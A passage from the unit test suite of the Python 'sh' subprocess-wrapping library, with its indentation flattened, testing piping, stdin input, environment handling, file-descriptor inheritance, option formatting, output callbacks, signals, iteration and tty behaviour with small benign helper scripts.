time.sleep(.2)
""")
inc_py = create_tmp_test("""
import sys
while True:
letter = sys.stdin.read(1)
if not letter:
break
sys.stdout.write(chr(ord(letter)+1))
""")
def inc(proc, *args, **kwargs):
return python(proc, "-u", inc_py.name, *args, **kwargs)
class Derp(object):
def __init__(self):
self.times = []
self.stdout = []
self.last_received = None
def agg(self, line):
self.stdout.append(line.strip())
now = time.time()
if self.last_received:
self.times.append(now - self.last_received)
self.last_received = now
derp = Derp()
p = inc(
inc(
inc(
python("-u", py.name, _piped=True),
_piped=True),
_piped=True),
_out=derp.agg)
p.wait()
self.assertEqual("".join(derp.stdout), "dqguhz")
self.assertTrue(all([t > .15 for t in derp.times]))
def test_manual_stdin_string(self):
from sh import tr
out = tr("[:lower:]", "[:upper:]", _in="andrew").strip()
self.assertEqual(out, "ANDREW")
def test_manual_stdin_iterable(self):
from sh import tr
test = ["testing\n", "herp\n", "derp\n"]
out = tr("[:lower:]", "[:upper:]", _in=test)
match = "".join([t.upper() for t in test])
self.assertEqual(out, match)
def test_manual_stdin_file(self):
from sh import tr
import tempfile
test_string = "testing\nherp\nderp\n"
stdin = tempfile.NamedTemporaryFile()
stdin.write(test_string.encode())
stdin.flush()
stdin.seek(0)
out = tr("[:lower:]", "[:upper:]", _in=stdin)
self.assertEqual(out, test_string.upper())
def test_manual_stdin_queue(self):
from sh import tr
try:
from Queue import Queue
except ImportError:
from queue import Queue
test = ["testing\n", "herp\n", "derp\n"]
q = Queue()
for t in test:
q.put(t)
q.put(None) # EOF
out = tr("[:lower:]", "[:upper:]", _in=q)
match = "".join([t.upper() for t in test])
self.assertEqual(out, match)
def test_environment(self):
""" tests that environments variables that we pass into sh commands
exist in the environment, and on the sh module """
import os
# this is the environment we'll pass into our commands
env = {"HERP": "DERP"}
# first we test that the environment exists in our child process as
# we've set it
py = create_tmp_test("""
import os
for key in list(os.environ.keys()):
if key != "HERP":
del os.environ[key]
print(dict(os.environ))
""")
out = python(py.name, _env=env).strip()
self.assertEqual(out, "{'HERP': 'DERP'}")
py = create_tmp_test("""
import os, sys
sys.path.insert(0, os.getcwd())
import sh
for key in list(os.environ.keys()):
if key != "HERP":
del os.environ[key]
print(dict(HERP=sh.HERP))
""")
out = python(py.name, _env=env, _cwd=THIS_DIR).strip()
self.assertEqual(out, "{'HERP': 'DERP'}")
        # Test that _env also accepts os.environ, which is a mapping but not a dict.
os.environ["HERP"] = "DERP"
out = python(py.name, _env=os.environ, _cwd=THIS_DIR).strip()
self.assertEqual(out, "{'HERP': 'DERP'}")
def test_which(self):
from sh import which, ls
self.assertEqual(which("fjoawjefojawe"), None)
self.assertEqual(which("ls"), str(ls))
def test_which_paths(self):
from sh import which
py = create_tmp_test("""
print("hi")
""")
test_path = dirname(py.name)
_, test_name = os.path.split(py.name)
found_path = which(test_name)
self.assertEqual(found_path, None)
found_path = which(test_name, [test_path])
self.assertEqual(found_path, py.name)
def test_no_close_fds(self):
# guarantee some extra fds in our parent process that don't close on exec. we have to explicitly do this
# because at some point (I believe python 3.4), python started being more stringent with closing fds to prevent
# security vulnerabilities. python 2.7, for example, doesn't set CLOEXEC on tempfile.TemporaryFile()s
#
# https://www.python.org/dev/peps/pep-0446/
tmp = [tempfile.TemporaryFile() for i in range(10)]
for t in tmp:
flags = fcntl.fcntl(t.fileno(), fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(t.fileno(), fcntl.F_SETFD, flags)
py = create_tmp_test("""
import os
print(len(os.listdir("/dev/fd")))
""")
out = python(py.name, _close_fds=False).strip()
        # pick some number greater than 4, since it's hard to know exactly how many fds will be open/inherited in the
# child
self.assertGreater(int(out), 7)
for t in tmp:
t.close()
def test_close_fds(self):
# guarantee some extra fds in our parent process that don't close on exec. we have to explicitly do this
# because at some point (I believe python 3.4), python started being more stringent with closing fds to prevent
# security vulnerabilities. python 2.7, for example, doesn't set CLOEXEC on tempfile.TemporaryFile()s
#
# https://www.python.org/dev/peps/pep-0446/
tmp = [tempfile.TemporaryFile() for i in range(10)]
for t in tmp:
flags = fcntl.fcntl(t.fileno(), fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(t.fileno(), fcntl.F_SETFD, flags)
py = create_tmp_test("""
import os
print(os.listdir("/dev/fd"))
""")
out = python(py.name).strip()
self.assertEqual(out, "['0', '1', '2', '3']")
for t in tmp:
t.close()
def test_pass_fds(self):
# guarantee some extra fds in our parent process that don't close on exec. we have to explicitly do this
# because at some point (I believe python 3.4), python started being more stringent with closing fds to prevent
# security vulnerabilities. python 2.7, for example, doesn't set CLOEXEC on tempfile.TemporaryFile()s
#
# https://www.python.org/dev/peps/pep-0446/
tmp = [tempfile.TemporaryFile() for i in range(10)]
for t in tmp:
flags = fcntl.fcntl(t.fileno(), fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(t.fileno(), fcntl.F_SETFD, flags)
last_fd = tmp[-1].fileno()
py = create_tmp_test("""
import os
print(os.listdir("/dev/fd"))
""")
out = python(py.name, _pass_fds=[last_fd]).strip()
inherited = [0, 1, 2, 3, last_fd]
inherited_str = [str(i) for i in inherited]
self.assertEqual(out, str(inherited_str))
for t in tmp:
t.close()
def test_no_arg(self):
import pwd
from sh import whoami
u1 = whoami().strip()
u2 = pwd.getpwuid(os.geteuid())[0]
self.assertEqual(u1, u2)
def test_incompatible_special_args(self):
from sh import ls
self.assertRaises(TypeError, ls, _iter=True, _piped=True)
def test_invalid_env(self):
from sh import ls
exc = TypeError
if IS_PY2 and MINOR_VER == 6:
exc = ValueError
self.assertRaises(exc, ls, _env="XXX")
self.assertRaises(exc, ls, _env={"foo": 123})
self.assertRaises(exc, ls, _env={123: "bar"})
def test_exception(self):
from sh import ErrorReturnCode_2
py = create_tmp_test("""
exit(2)
""")
self.assertRaises(ErrorReturnCode_2, python, py.name)
def test_piped_exception1(self):
from sh import ErrorReturnCode_2
py = create_tmp_test("""
import sys
sys.stdout.write("line1\\n")
sys.stdout.write("line2\\n")
exit(2)
""")
py2 = create_tmp_test("")
def fn():
list(python(python(py.name, _piped=True), "-u", py2.name, _iter=True))
self.assertRaises(ErrorReturnCode_2, fn)
def test_piped_exception2(self):
from sh import ErrorReturnCode_2
py = create_tmp_test("""
import sys
sys.stdout.write("line1\\n")
sys.stdout.write("line2\\n")
exit(2)
""")
py2 = create_tmp_test("")
def fn():
python(python(py.name, _piped=True), "-u", py2.name)
self.assertRaises(ErrorReturnCode_2, fn)
def test_command_not_found(self):
from sh import CommandNotFound
def do_import():
from sh import aowjgoawjoeijaowjellll # noqa: F401
self.assertRaises(ImportError, do_import)
def do_import():
import sh
sh.awoefaowejfw
self.assertRaises(CommandNotFound, do_import)
def do_import():
import sh
sh.Command("ofajweofjawoe")
self.assertRaises(CommandNotFound, do_import)
def test_command_wrapper_equivalence(self):
from sh import Command, ls, which
self.assertEqual(Command(which("ls")), ls)
def test_doesnt_execute_directories(self):
save_path = os.environ['PATH']
bin_dir1 = tempfile.mkdtemp()
bin_dir2 = tempfile.mkdtemp()
gcc_dir1 = os.path.join(bin_dir1, 'gcc')
gcc_file2 = os.path.join(bin_dir2, 'gcc')
try:
os.environ['PATH'] = os.pathsep.join((bin_dir1, bin_dir2))
# a folder named 'gcc'; it's executable, but it should not be
# discovered by the internal which(1) clone
os.makedirs(gcc_dir1)
# an executable named gcc -- only this should be executed
bunk_header = '#!/bin/sh\necho $*'
with open(gcc_file2, "w") as h:
h.write(bunk_header)
os.chmod(gcc_file2, int(0o755))
import sh
from sh import gcc
if IS_PY3:
self.assertEqual(gcc._path,
gcc_file2.encode(sh.DEFAULT_ENCODING))
else:
self.assertEqual(gcc._path, gcc_file2)
self.assertEqual(gcc('no-error').stdout.strip(),
'no-error'.encode("ascii"))
finally:
os.environ['PATH'] = save_path
if exists(gcc_file2):
os.unlink(gcc_file2)
if exists(gcc_dir1):
os.rmdir(gcc_dir1)
if exists(bin_dir1):
os.rmdir(bin_dir1)
if exists(bin_dir2):
os.rmdir(bin_dir2)
def test_multiple_args_short_option(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-l", dest="long_option")
options, args = parser.parse_args()
print(len(options.long_option.split()))
""")
num_args = int(python(py.name, l="one two three")) # noqa: E741
self.assertEqual(num_args, 3)
num_args = int(python(py.name, "-l", "one's two's three's"))
self.assertEqual(num_args, 3)
def test_multiple_args_long_option(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-l", "--long-option", dest="long_option")
options, args = parser.parse_args()
print(len(options.long_option.split()))
""")
num_args = int(python(py.name, long_option="one two three",
nothing=False))
self.assertEqual(num_args, 3)
num_args = int(python(py.name, "--long-option", "one's two's three's"))
self.assertEqual(num_args, 3)
def test_short_bool_option(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-s", action="store_true", default=False, dest="short_option")
options, args = parser.parse_args()
print(options.short_option)
""")
self.assertTrue(python(py.name, s=True).strip() == "True")
self.assertTrue(python(py.name, s=False).strip() == "False")
self.assertTrue(python(py.name).strip() == "False")
def test_long_bool_option(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-l", "--long-option", action="store_true", default=False, dest="long_option")
options, args = parser.parse_args()
print(options.long_option)
""")
self.assertTrue(python(py.name, long_option=True).strip() == "True")
self.assertTrue(python(py.name).strip() == "False")
def test_false_bool_ignore(self):
py = create_tmp_test("""
import sys
print(sys.argv[1:])
""")
test = True
self.assertEqual(python(py.name, test and "-n").strip(), "['-n']")
test = False
self.assertEqual(python(py.name, test and "-n").strip(), "[]")
def test_composition(self):
from sh import ls, wc
c1 = int(wc(ls("-A1"), l=True)) # noqa: E741
c2 = len(os.listdir("."))
self.assertEqual(c1, c2)
def test_incremental_composition(self):
from sh import ls, wc
c1 = int(wc(ls("-A1", _piped=True), l=True).strip()) # noqa: E741
c2 = len(os.listdir("."))
self.assertEqual(c1, c2)
def test_short_option(self):
from sh import sh
s1 = sh(c="echo test").strip()
s2 = "test"
self.assertEqual(s1, s2)
def test_long_option(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-l", "--long-option", action="store", default="", dest="long_option")
options, args = parser.parse_args()
print(options.long_option.upper())
""")
self.assertTrue(python(py.name, long_option="testing").strip() == "TESTING")
self.assertTrue(python(py.name).strip() == "")
def test_raw_args(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--long_option", action="store", default=None,
dest="long_option1")
parser.add_option("--long-option", action="store", default=None,
dest="long_option2")
options, args = parser.parse_args()
if options.long_option1:
print(options.long_option1.upper())
else:
print(options.long_option2.upper())
""")
self.assertEqual(python(py.name,
{"long_option": "underscore"}).strip(), "UNDERSCORE")
self.assertEqual(python(py.name, long_option="hyphen").strip(), "HYPHEN")
def test_custom_separator(self):
py = create_tmp_test("""
import sys
print(sys.argv[1])
""")
opt = {"long-option": "underscore"}
correct = "--long-option=custom=underscore"
out = python(py.name, opt, _long_sep="=custom=").strip()
self.assertEqual(out, correct)
# test baking too
correct = "--long-option=baked=underscore"
python_baked = python.bake(py.name, opt, _long_sep="=baked=")
out = python_baked().strip()
self.assertEqual(out, correct)
def test_custom_separator_space(self):
py = create_tmp_test("""
import sys
print(str(sys.argv[1:]))
""")
opt = {"long-option": "space"}
correct = ["--long-option", "space"]
out = python(py.name, opt, _long_sep=" ").strip()
self.assertEqual(out, str(correct))
def test_custom_long_prefix(self):
py = create_tmp_test("""
import sys
print(sys.argv[1])
""")
out = python(py.name, {"long-option": "underscore"},
_long_prefix="-custom-").strip()
self.assertEqual(out, "-custom-long-option=underscore")
out = python(py.name, {"long-option": True},
_long_prefix="-custom-").strip()
self.assertEqual(out, "-custom-long-option")
# test baking too
out = python.bake(py.name, {"long-option": "underscore"},
_long_prefix="-baked-")().strip()
self.assertEqual(out, "-baked-long-option=underscore")
out = python.bake(py.name, {"long-option": True},
_long_prefix="-baked-")().strip()
self.assertEqual(out, "-baked-long-option")
def test_command_wrapper(self):
from sh import Command, which
ls = Command(which("ls"))
wc = Command(which("wc"))
c1 = int(wc(ls("-A1"), l=True)) # noqa: E741
c2 = len(os.listdir("."))
self.assertEqual(c1, c2)
def test_background(self):
from sh import sleep
import time
start = time.time()
sleep_time = .5
p = sleep(sleep_time, _bg=True)
now = time.time()
self.assertLess(now - start, sleep_time)
p.wait()
now = time.time()
self.assertGreater(now - start, sleep_time)
def test_background_exception(self):
from sh import ls, ErrorReturnCode_1, ErrorReturnCode_2
p = ls("/ofawjeofj", _bg=True, _bg_exc=False) # should not raise
exc_to_test = ErrorReturnCode_2
if IS_MACOS:
exc_to_test = ErrorReturnCode_1
self.assertRaises(exc_to_test, p.wait) # should raise
def test_with_context(self):
from sh import whoami
import getpass
py = create_tmp_test("""
import sys
import os
import subprocess
print("with_context")
subprocess.Popen(sys.argv[1:], shell=False).wait()
""")
cmd1 = python.bake(py.name, _with=True)
with cmd1:
out = whoami()
self.assertIn("with_context", out)
self.assertIn(getpass.getuser(), out)
def test_with_context_args(self):
from sh import whoami
import getpass
py = create_tmp_test("""
import sys
import os
import subprocess
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-o", "--opt", action="store_true", default=False, dest="opt")
options, args = parser.parse_args()
if options.opt:
subprocess.Popen(args[0], shell=False).wait()
""")
with python(py.name, opt=True, _with=True):
out = whoami()
self.assertTrue(getpass.getuser() == out.strip())
with python(py.name, _with=True):
out = whoami()
self.assertTrue(out == "")
def test_binary_input(self):
py = create_tmp_test("""
import sys
data = sys.stdin.read()
sys.stdout.write(data)
""")
data = b'1234'
out = python(py.name, _in=data)
self.assertEqual(out, "1234")
def test_err_to_out(self):
py = create_tmp_test("""
import sys
import os
sys.stdout.write("stdout")
sys.stdout.flush()
sys.stderr.write("stderr")
sys.stderr.flush()
""")
stdout = python(py.name, _err_to_out=True)
self.assertEqual(stdout, "stdoutstderr")
def test_err_to_out_and_sys_stdout(self):
py = create_tmp_test("""
import sys
import os
sys.stdout.write("stdout")
sys.stdout.flush()
sys.stderr.write("stderr")
sys.stderr.flush()
""")
master, slave = os.pipe()
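# with an explicit _out fd, nothing is aggregated on the command object; _err_to_out merges stderr into the same pipe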
stdout = python(py.name, _err_to_out=True, _out=slave)
self.assertEqual(stdout, "")
self.assertEqual(os.read(master, 12), b"stdoutstderr")
def test_err_piped(self):
py = create_tmp_test("""
import sys
sys.stderr.write("stderr")
""")
py2 = create_tmp_test("""
import sys
while True:
line = sys.stdin.read()
if not line:
break
sys.stdout.write(line)
""")
out = python(python("-u", py.name, _piped="err"), "-u", py2.name)
self.assertEqual(out, "stderr")
def test_out_redirection(self):
import tempfile
py = create_tmp_test("""
import sys
import os
sys.stdout.write("stdout")
sys.stderr.write("stderr")
""")
file_obj = tempfile.NamedTemporaryFile()
out = python(py.name, _out=file_obj)
self.assertEqual(len(out), 0)
file_obj.seek(0)
actual_out = file_obj.read()
file_obj.close()
self.assertNotEqual(len(actual_out), 0)
# test with tee
file_obj = tempfile.NamedTemporaryFile()
out = python(py.name, _out=file_obj, _tee=True)
self.assertGreater(len(out), 0)
file_obj.seek(0)
actual_out = file_obj.read()
file_obj.close()
self.assertGreater(len(actual_out), 0)
def test_err_redirection(self):
import tempfile
py = create_tmp_test("""
import sys
import os
sys.stdout.write("stdout")
sys.stderr.write("stderr")
""")
file_obj = tempfile.NamedTemporaryFile()
p = python("-u", py.name, _err=file_obj)
file_obj.seek(0)
stderr = file_obj.read().decode()
file_obj.close()
self.assertEqual(p.stdout, b"stdout")
self.assertEqual(stderr, "stderr")
self.assertEqual(len(p.stderr), 0)
# now with tee
file_obj = tempfile.NamedTemporaryFile()
p = python(py.name, _err=file_obj, _tee="err")
file_obj.seek(0)
stderr = file_obj.read().decode()
file_obj.close()
self.assertEqual(p.stdout, b"stdout")
self.assertEqual(stderr, "stderr")
self.assertGreater(len(p.stderr), 0)
def test_tty_tee(self):
py = create_tmp_test("""
import sys
sys.stdout.write("stdout")
""")
read, write = pty.openpty()
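# when _out is a file descriptor, sh writes the child's output there and leaves .stdout empty unless _tee=True is also given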
out = python("-u", py.name, _out=write).stdout
tee = os.read(read, 6)
self.assertEqual(out, b"")
self.assertEqual(tee, b"stdout")
os.close(write)
os.close(read)
read, write = pty.openpty()
out = python("-u", py.name, _out=write, _tee=True).stdout
tee = os.read(read, 6)
self.assertEqual(out, b"stdout")
self.assertEqual(tee, b"stdout")
os.close(write)
os.close(read)
def test_err_redirection_actual_file(self):
import tempfile
file_obj = tempfile.NamedTemporaryFile()
py = create_tmp_test("""
import sys
import os
sys.stdout.write("stdout")
sys.stderr.write("stderr")
""")
stdout = python("-u", py.name, _err=file_obj.name).wait()
file_obj.seek(0)
stderr = file_obj.read().decode()
file_obj.close()
self.assertTrue(stdout == "stdout")
self.assertTrue(stderr == "stderr")
def test_subcommand_and_bake(self):
import getpass
py = create_tmp_test("""
import sys
import os
import subprocess
print("subcommand")
subprocess.Popen(sys.argv[1:], shell=False).wait()
""")
cmd1 = python.bake(py.name)
out = cmd1.whoami()
self.assertIn("subcommand", out)
self.assertIn(getpass.getuser(), out)
def test_multiple_bakes(self):
py = create_tmp_test("""
import sys
sys.stdout.write(str(sys.argv[1:]))
""")
out = python.bake(py.name).bake("bake1").bake("bake2")()
self.assertEqual("['bake1', 'bake2']", out)
def test_arg_preprocessor(self):
py = create_tmp_test("""
import sys
sys.stdout.write(str(sys.argv[1:]))
""")
def arg_preprocess(args, kwargs):
args.insert(0, "preprocessed")
kwargs["a-kwarg"] = 123
return args, kwargs
cmd = python.bake(py.name, _arg_preprocess=arg_preprocess)
out = cmd("arg")
self.assertEqual("['preprocessed', 'arg', '--a-kwarg=123']", out)
def test_bake_args_come_first(self):
from sh import ls
ls = ls.bake(h=True)
ran = ls("-la").ran
ft = ran.index("-h")
self.assertIn("-la", ran[ft:])
def test_output_equivalence(self):
from sh import whoami
iam1 = whoami()
iam2 = whoami()
self.assertEqual(iam1, iam2)
# https://github.com/amoffat/sh/pull/252
def test_stdout_pipe(self):
py = create_tmp_test(r"""
import sys
sys.stdout.write("foobar\n")
""")
read_fd, write_fd = os.pipe()
python(py.name, _out=write_fd, u=True)
def alarm(sig, action):
self.fail("Timeout while reading from pipe")
import signal
signal.signal(signal.SIGALRM, alarm)
signal.alarm(3)
data = os.read(read_fd, 100)
self.assertEqual(b"foobar\n", data)
signal.alarm(0)
signal.signal(signal.SIGALRM, signal.SIG_DFL)
def test_stdout_callback(self):
py = create_tmp_test("""
import sys
import os
for i in range(5): print(i)
""")
stdout = []
def agg(line):
stdout.append(line)
p = python("-u", py.name, _out=agg)
p.wait()
self.assertEqual(len(stdout), 5)
def test_stdout_callback_no_wait(self):
import time
py = create_tmp_test("""
import sys
import os
import time
for i in range(5):
print(i)
time.sleep(.5)
""")
stdout = []
def agg(line): stdout.append(line)
python("-u", py.name, _out=agg, _bg=True)
# we give a little pause to make sure that the NamedTemporaryFile
# exists when the python process actually starts
time.sleep(.5)
self.assertNotEqual(len(stdout), 5)
def test_stdout_callback_line_buffered(self):
py = create_tmp_test("""
import sys
import os
for i in range(5): print("herpderp")
""")
stdout = []
def agg(line): stdout.append(line)
p = python("-u", py.name, _out=agg, _out_bufsize=1)
p.wait()
self.assertEqual(len(stdout), 5)
def test_stdout_callback_line_unbuffered(self):
py = create_tmp_test("""
import sys
import os
for i in range(5): print("herpderp")
""")
stdout = []
def agg(char): stdout.append(char)
p = python("-u", py.name, _out=agg, _out_bufsize=0)
p.wait()
# + 5 newlines
self.assertEqual(len(stdout), len("herpderp") * 5 + 5)
def test_stdout_callback_buffered(self):
py = create_tmp_test("""
import sys
import os
for i in range(5): sys.stdout.write("herpderp")
""")
stdout = []
def agg(chunk): stdout.append(chunk)
p = python("-u", py.name, _out=agg, _out_bufsize=4)
p.wait()
self.assertEqual(len(stdout), len("herp") / 2 * 5)
def test_stdout_callback_with_input(self):
py = create_tmp_test("""
import sys
import os
IS_PY3 = sys.version_info[0] == 3
if IS_PY3: raw_input = input
for i in range(5): print(str(i))
derp = raw_input("herp? ")
print(derp)
""")
def agg(line, stdin):
if line.strip() == "4":
stdin.put("derp\n")
p = python("-u", py.name, _out=agg, _tee=True)
p.wait()
self.assertIn("derp", p)
def test_stdout_callback_exit(self):
py = create_tmp_test("""
import sys
import os
for i in range(5): print(i)
""")
stdout = []
def agg(line):
line = line.strip()
stdout.append(line)
if line == "2":
return True
p = python("-u", py.name, _out=agg, _tee=True)
p.wait()
self.assertIn("4", p)
self.assertNotIn("4", stdout)
def test_stdout_callback_terminate(self):
import signal
py = create_tmp_test("""
import sys
import os
import time
for i in range(5):
print(i)
time.sleep(.5)
""")
stdout = []
def agg(line, stdin, process):
line = line.strip()
stdout.append(line)
if line == "3":
process.terminate()
return True
import sh
caught_signal = False
try:
p = python("-u", py.name, _out=agg, _bg=True)
p.wait()
except sh.SignalException_SIGTERM:
caught_signal = True
self.assertTrue(caught_signal)
self.assertEqual(p.process.exit_code, -signal.SIGTERM)
self.assertNotIn("4", p)
self.assertNotIn("4", stdout)
def test_stdout_callback_kill(self):
import signal
py = create_tmp_test("""
import sys
import os
import time
for i in range(5):
print(i)
time.sleep(.5)
""")
stdout = []
def agg(line, stdin, process):
line = line.strip()
stdout.append(line)
if line == "3":
process.kill()
return True
import sh
caught_signal = False
try:
p = python("-u", py.name, _out=agg, _bg=True)
p.wait()
except sh.SignalException_SIGKILL:
caught_signal = True
self.assertTrue(caught_signal)
self.assertEqual(p.process.exit_code, -signal.SIGKILL)
self.assertNotIn("4", p)
self.assertNotIn("4", stdout)
def test_general_signal(self):
from signal import SIGINT
py = create_tmp_test("""
import sys
import os
import time
import signal
def sig_handler(sig, frame):
print(10)
exit(0)
signal.signal(signal.SIGINT, sig_handler)
for i in range(5):
print(i)
sys.stdout.flush()
time.sleep(0.5)
""")
stdout = []
def agg(line, stdin, process):
line = line.strip()
stdout.append(line)
if line == "3":
process.signal(SIGINT)
return True
p = python(py.name, _out=agg, _tee=True)
p.wait()
self.assertEqual(p.process.exit_code, 0)
self.assertEqual(p, "0\n1\n2\n3\n10\n")
def test_iter_generator(self):
py = create_tmp_test("""
import sys
import os
import time
for i in range(42):
print(i)
sys.stdout.flush()
""")
out = []
for line in python(py.name, _iter=True):
out.append(int(line.strip()))
self.assertEqual(len(out), 42)
self.assertEqual(sum(out), 861)
def test_iter_unicode(self):
# issue https://github.com/amoffat/sh/issues/224
test_string = "\xe4\xbd\x95\xe4\xbd\x95\n" * 150  # len > buffer size
txt = create_tmp_test(test_string)
for line in sh.cat(txt.name, _iter=True):
break
self.assertLess(len(line), 1024)
def test_nonblocking_iter(self):
from errno import EWOULDBLOCK
py = create_tmp_test("""
import time
import sys
time.sleep(1)
sys.stdout.write("stdout")
""")
count = 0
value = None
for line in python(py.name, _iter_noblock=True):
if line == EWOULDBLOCK:
count += 1
else:
value = line
self.assertGreater(count, 0)
self.assertEqual(value, "stdout")
py = create_tmp_test("""
import time
import sys
time.sleep(1)
sys.stderr.write("stderr")
""")
count = 0
value = None
for line in python(py.name, _iter_noblock="err"):
if line == EWOULDBLOCK:
count += 1
else:
value = line
self.assertGreater(count, 0)
self.assertEqual(value, "stderr")
def test_for_generator_to_err(self):
py = create_tmp_test("""
import sys
import os
for i in range(42):
sys.stderr.write(str(i)+"\\n")
""")
out = []
for line in python("-u", py.name, _iter="err"):
out.append(line)
self.assertEqual(len(out), 42)
# verify that nothing is going to stdout
out = []
for line in python("-u", py.name, _iter="out"):
out.append(line)
self.assertEqual(len(out), 0)
def test_sigpipe(self):
py1 = create_tmp_test("""
import sys
import os
import time
import signal
# by default, python disables SIGPIPE, in favor of using IOError exceptions, so
# let's put that back to the system default where we terminate with a signal
# exit code
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
for letter in "andrew":
time.sleep(0.6)
print(letter)
""")
py2 = create_tmp_test("""
import sys
import os
import time
while True:
line = sys.stdin.readline()
if not line:
break
print(line.strip().upper())
exit(0)
""")
p1 = python("-u", py1.name, _piped="out")
p2 = python(p1, "-u", py2.name)
# SIGPIPE should happen, but it shouldn't be an error, since _piped is
# truthy
self.assertEqual(-p1.exit_code, signal.SIGPIPE)
self.assertEqual(p2.exit_code, 0)
def test_piped_generator(self):
import time
py1 = create_tmp_test("""
import sys
import os
import time
for letter in "andrew":
time.sleep(0.6)
print(letter)
""")
py2 = create_tmp_test("""
import sys
import os
import time
while True:
line = sys.stdin.readline()
if not line:
break
print(line.strip().upper())
""")
times = []
last_received = None
letters = ""
for line in python(python("-u", py1.name, _piped="out"), "-u",
py2.name, _iter=True):
letters += line.strip()
now = time.time()
if last_received:
times.append(now - last_received)
last_received = now
self.assertEqual("ANDREW", letters)
self.assertTrue(all([t > .3 for t in times]))
def test_generator_and_callback(self):
py = create_tmp_test("""
import sys
import os
for i in range(42):
sys.stderr.write(str(i * 2)+"\\n")
print(i)
""")
stderr = []
def agg(line):
stderr.append(int(line.strip()))
out = []
for line in python("-u", py.name, _iter=True, _err=agg):
out.append(line)
self.assertEqual(len(out), 42)
self.assertEqual(sum(stderr), 1722)
def test_cast_bg(self):
py = create_tmp_test("""
import sys
import time
time.sleep(0.5)
sys.stdout.write(sys.argv[1])
""")
self.assertEqual(int(python(py.name, "123", _bg=True)), 123)
self.assertEqual(long(python(py.name, "456", _bg=True)), 456)
self.assertEqual(float(python(py.name, "789", _bg=True)), 789.0)
def test_cmd_eq(self):
py = create_tmp_test("")
cmd1 = python.bake(py.name, "-u")
cmd2 = python.bake(py.name, "-u")
cmd3 = python.bake(py.name)
self.assertEqual(cmd1, cmd2)
self.assertNotEqual(cmd1, cmd3)
def test_fg(self):
py = create_tmp_test("exit(0)")
# notice we're using `system_python`, and not `python`. this is because
# `python` has an env baked into it, and we want `_env` to be None for
# coverage
system_python(py.name, _fg=True)
def test_fg_false(self):
""" https://github.com/amoffat/sh/issues/520 """
py = create_tmp_test("print('hello')")
buf = StringIO()
python(py.name, _fg=False, _out=buf)
self.assertEqual(buf.getvalue(), "hello\n")
def test_fg_true(self):
""" https://github.com/amoffat/sh/issues/520 """
py = create_tmp_test("print('hello')")
buf = StringIO()
self.assertRaises(TypeError, python, py.name, _fg=True, _out=buf)
def test_fg_env(self):
py = create_tmp_test("""
import os
code = int(os.environ.get("EXIT", "0"))
exit(code)
""")
env = os.environ.copy()
env["EXIT"] = "3"
self.assertRaises(sh.ErrorReturnCode_3, python, py.name, _fg=True,
_env=env)
def test_fg_alternative(self):
py = create_tmp_test("exit(0)")
python(py.name, _in=sys.stdin, _out=sys.stdout, _err=sys.stderr)
def test_fg_exc(self):
py = create_tmp_test("exit(1)")
self.assertRaises(sh.ErrorReturnCode_1, python, py.name, _fg=True)
def test_out_filename(self):
outfile = tempfile.NamedTemporaryFile()
py = create_tmp_test("print('output')")
python(py.name, _out=outfile.name)
outfile.seek(0)
self.assertEqual(b"output\n", outfile.read())
def test_bg_exit_code(self):
py = create_tmp_test("""
import time
time.sleep(1)
exit(49)
""")
p = python(py.name, _ok_code=49, _bg=True)
self.assertEqual(49, p.exit_code)
def test_cwd(self):
from sh import pwd
from os.path import realpath
self.assertEqual(str(pwd(_cwd="/tmp")), realpath("/tmp") + "\n")
self.assertEqual(str(pwd(_cwd="/etc")), realpath("/etc") + "\n")
def test_cwd_fg(self):
td = realpath(tempfile.mkdtemp())
py = create_tmp_test("""
import sh
import os
from os.path import realpath
orig = realpath(os.getcwd())
print(orig)
sh.pwd(_cwd="{newdir}", _fg=True)
print(realpath(os.getcwd()))
""".format(newdir=td))
orig, newdir, restored = python(py.name).strip().split("\n")
newdir = realpath(newdir)
self.assertEqual(newdir, td)
self.assertEqual(orig, restored)
self.assertNotEqual(orig, newdir)
os.rmdir(td)
def test_huge_piped_data(self):
from sh import tr
stdin = tempfile.NamedTemporaryFile()
data = "herpderp" * 4000 + "\n"
stdin.write(data.encode())
stdin.flush()
stdin.seek(0)
out = tr(tr("[:lower:]", "[:upper:]", _in=data), "[:upper:]", "[:lower:]")
self.assertTrue(out == data)
def test_tty_input(self):
py = create_tmp_test("""
import sys
import os
if os.isatty(sys.stdin.fileno()):
sys.stdout.write("password?\\n")
sys.stdout.flush()
pw = sys.stdin.readline().strip()
sys.stdout.write("%s\\n" % ("*" * len(pw)))
sys.stdout.flush()
else:
sys.stdout.write("no tty attached!\\n")
sys.stdout.flush()
""")
test_pw = "test123"
expected_stars = "*" * len(test_pw)
d = {}
def password_enterer(line, stdin):
line = line.strip()
if not line:
return
if line == "password?":
stdin.put(test_pw + "\n")
elif line.startswith("*"):
d["stars"] = line
return True
pw_stars = python(py.name, _tty_in=True, _out=password_enterer)
pw_stars.wait()
self.assertEqual(d["stars"], expected_stars)
response = python(py.name)
self.assertEqual(response, "no tty attached!\n")
def test_tty_output(self):
py = create_tmp_test("""
import sys
import os
if os.isatty(sys.stdout.fileno()):
sys.stdout.write("tty attached")
sys.stdout.flush()
else:
sys.stdout.write("no tty attached")
sys.stdout.flush()
""")
out = python(py.name, _tty_out=True)
self.assertEqual(out, "tty attached")
out = python(py.name, _tty_out=False)
self.assertEqual(out, "no tty attached")
def test_stringio_output(self):
from sh import echo
out = StringIO()
echo("-n", "testing 123", _out=out)
self.assertEqual(out.getvalue(), "testing 123")
out = cStringIO()
echo("-n", "testing 123", _out=out)
self.assertEqual(out.getvalue().decode(), "testing 123")
out = ioStringIO()
echo("-n", "testing 123", _out=out)
self.assertEqual(out.getvalue(), "testing 123")
out = iocStringIO()
echo("-n", "testing 123", _out=out)
self.assertEqual(out.getvalue().decode(), "testing 123")
def test_stringio_input(self):
from sh import cat
input = StringIO()
